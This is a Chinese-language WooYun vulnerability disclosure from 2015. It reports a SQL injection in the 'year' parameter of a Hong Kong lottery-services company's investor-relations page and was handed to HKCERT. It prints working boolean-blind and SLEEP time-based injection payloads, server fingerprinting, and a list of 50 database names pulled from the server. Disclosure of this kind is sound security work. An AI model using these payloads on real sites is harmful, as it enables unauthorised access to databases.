当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163842

漏洞标题:眾彩科技主站SQL Injection(香港地區)

相关厂商:众彩科技

漏洞作者: wooyun_def

提交时间:2015-12-24 16:20

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

眾彩科技股份有限公司(「眾彩股份」或「本公司」)乃於香港聯合交易所有限公司創業板上市。
眾彩股份為中國采彡PIAO界別中最全面之采彡PIAO服務供應商之一,其業務涵蓋國內╱五個省市,所涉及的領域由向中國采彡PIAO發行當局提供內部研發的軟硬件,伸延至建立本集團本身的采彡PIAO銷售點網絡以銷售中國采彡PIAO發行當局之產品。除了榮獲國內采彡PIAO界別中多項「第一」的殊榮外,眾彩股份亦為世界采彡PIAO業協會(「WLA」)之會員。

详细说明:

12.png


http://**.**.**.**/sc/ir_announce.php?year=2014
http://**.**.**.**/tc/ir_announce.php?year=2014
http://**.**.**.**/html/ir_announce.php?year=2014


Parameter: year (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: year=2014' AND 5085=5085 AND 'bsBs'='bsBs
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: year=2014' AND (SELECT * FROM (SELECT(SLEEP(5)))Fkvb) AND 'guYJ'='guYJ
---
[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12

漏洞证明:

available databases [50]:
[*] `bboard_d`lete`
[*] `new-ray_delete`
[*] aastocks_db_delete
[*] bboard2_delete
[*] chinastarch1_delete
[*] cks
[*] cks_new
[*] community_delete
[*] doubleindex_delete
[*] ginsengnatural_delete
[*] glkg_delete
[*] hds_2009_delete
[*] hds_delete
[*] information_schema
[*] jiuhao
[*] kotocms003
[*] kotoportal003
[*] l_xingyecopper_delete
[*] maryhelp_delete
[*] mh_delete
[*] midea_delete
[*] mysql
[*] mysql_old
[*] newworld_delete
[*] newworld_demo_delete
[*] ntop_delete
[*] onlinereport_delete
[*] performance_schema
[*] report
[*] report_delete
[*] samkadm_cms_delete
[*] smart_xtep_delete
[*] snowkiss
[*] tdn_delete
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_export
[*] tomocms2_log
[*] tomocms2_my
[*] tomocms2_restore
[*] tomocms2_sg
[*] tomocms2_temp
[*] tomocms2_tw
[*] tomocms2copy_delete
[*] tomocms_delete
[*] view_db_delete
[*] web2project_delete
[*] wordpress_delete
[*] xinhuapinmei

修复方案:

过滤

版权声明:转载请注明来源 wooyun_def@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-28 19:12

厂商回复:

已將事件通知有關機構

最新状态:

暂无